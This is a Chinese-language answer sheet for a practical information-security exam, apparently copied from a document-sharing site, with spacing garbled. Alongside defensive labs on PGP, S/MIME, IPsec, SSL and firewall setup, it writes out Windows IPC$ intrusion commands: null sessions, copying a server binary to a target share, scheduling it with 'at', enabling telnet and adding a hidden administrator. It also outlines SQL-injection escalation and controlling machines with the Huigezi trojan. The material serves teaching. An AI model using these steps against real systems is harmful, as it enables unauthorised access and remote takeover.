信息安全技术与实施实操考试是题答案.docx

信息安全技术与实施实操考试是题答案.docx

《信息安全技术与实施实操考试是题答案.docx》由会员分享，可在线阅读，更多相关《信息安全技术与实施实操考试是题答案.docx（36页珍藏版）》请在冰豆网上搜索。

信息安全技术与实施实操考试是题答案

网络安全技术实验

netsharezzz=d:

\zzz共享d:

\zzz共享名为zzz

netuse\\ip\zzz123/user:

zero

用户zero密码123连接共享

copy\\ip\zzz\xxx.xxxC:

\xxx.xxx

从共享复制xxx.xxx到C:

\xxx.xxx

[添加管理员用户]

netuserzero123/add添加zero用户密码为123

netlocalgroupadministratorszero/add

添加zero到administrators用户组

ftp

open?

.?

.?

.?

用户名密码

putx:

\xxx.xxx上传

getxxx.xxxx:

\xxx.xxx下载

bye退出

--------------------------------------------------------------------------

[IPC$攻击]

netuse\\ip\ipc$""/user:

""

copyC:

\Server.exe\\ip\ipc$

[计划任务]

nettime\\ip查看ip当前时间

at\\iptimeServer.exe

telnetip

添加管理员用户如上题

一.熟悉常见的系统命令

在命令行下完成以下命令的功能使用：

Netshare（创建共享文件夹）

C:

\>md56

C:

\>netshare56=c:

\56

56共享成功。

Netuse（访问并复制共享文件夹中的内容到本地计算机）

netuse\\ip\zzz123/user:

zero

用户zero密码123连接共享

copy\\ip\zzz\xxx.xxxC:

\xxx.xxx

从共享复制xxx.xxx到C:

\xxx.xxx

Netuser（创建用户账号、并将用户添加到管理员组）

ftp（完成FTP的上传、下载）

（一）IPC$攻击

利用IPC$漏洞对未打补丁的Windows计算机实施攻击

主要步骤：

1.扫描IPC$计算机

2.将Server.exe程序上传到目标机器

E:

\实验工具\IPC$攻击工具>netuse

E:

\实验工具\IPC$攻击工具>copyE:

\实验工具\IPC$攻击工具\SRV.EXE\\192.168.1.11\e$\SRV.EXE

3.为目标计算机指定计划任务

E:

\实验工具\IPC$攻击工具>at\\192.168.1.1119:

33srv.exe

4.用Telnet命令连接

sc\\192.168.1.11starttlntsvr

telnet192.168.1.11

5.添加管理员账号

E:

\>netuserlijietiansotian/add

E:

\>netlocalgroupadministratorslijietian/add

（二）SQL注入漏洞提权

1.将嘉枫文章管理系统发布到IIS上

2.用domain4.1进行旁注检测

3.猜解表名

4.猜解列名

5.破解用户名、密码

6.管理入口扫描

7.用得到的管理员账号登录

（三）电子邮件安全（PGP）

用PGP实现电子邮件的加密/签名和解密/校验

1.配置OutlookExpress可正确收发邮件

2.产生密钥对

3.导入对方公钥

4.签名并信任对方公钥

5.成功发送加密邮件，成功解密密文

6.成功发送签名邮件，正确验证签名

7.成功发送加密并签名邮件，正确解密校验邮件

（四）电子邮件安全（S-MIME）

用OutlookExpress自带的安全功能实现电子邮件的加密/签名和解密/校验

1.配置OutlookExpress可正确收发邮

2.下载安装CA证书’

3.申请并下载安装电子邮件安全证书

4.获得对方的数字标识

5.成功发送加密邮件，成功解密密文

6.成功发送签名邮件，正确验证签名

7.成功发送加密并签名邮件，正确解密校验邮件

（五）防火墙ISAServer2004

通过配置防火墙策略实现如下内容

1.在ISA主机上安装IIS，并配置Web服务，网站首页为自己的姓名和学号；

2.配置防火墙策略允许另一台计算机可以访问Web页面；

3.在另一台非ISA主机上安装配置POP3服务，并配置邮件服务；

4.配置防火墙策略允许ISA主机访问邮件服务。

Ø正确安装IIS，并配置Web服务，首页正确

Ø防火墙策略：

允许访问web服务，验证正确

Ø正确安装POP3服务，并建立域和邮箱，能提供邮件服务

Ø防火墙策略：

允许ISA主机访问邮件服务，可收发邮件

（六）IP安全策略

实现两台计算机之间所有IP通信的安全传输（要求使用证书进行身份验证）

1.下载并安装CA证书，使之成为受信任的根证书颁发机构；

2.分别为两台主机申请并安装客户端身份证书；

3.配置IP安全策略（要求安全通信），要求仅在特定的两台主机之间实现IP安全通信

4.

5.能够完成IP安全通信，并验证。

（可使用网络监视器或IPSec监视器捕获查看）

SSL

用SSL实现Web服务器和客户端（浏览器）之间的安全通信（要求客户端证书）。

1.在IIS的Web服务器中，生成证书申请文件；

2.为IIS的Web服务器申请证书；

3.下载并安装该证书；

4.配置Web服务器，申请SSL安全通道，并要求客户端证书；

5.为客户机的浏览器申请浏览器证书并下载、安装。

6.两台主机之间能够进行通信（访问网站），要求网站的主页显示自己的学号和姓名

（七）灰鸽子

用灰鸽子实现远程控制

1.正确配置服务器程序（即木马）；

2.实现对肉机的控制（关闭/开启服务，远程重启或关机）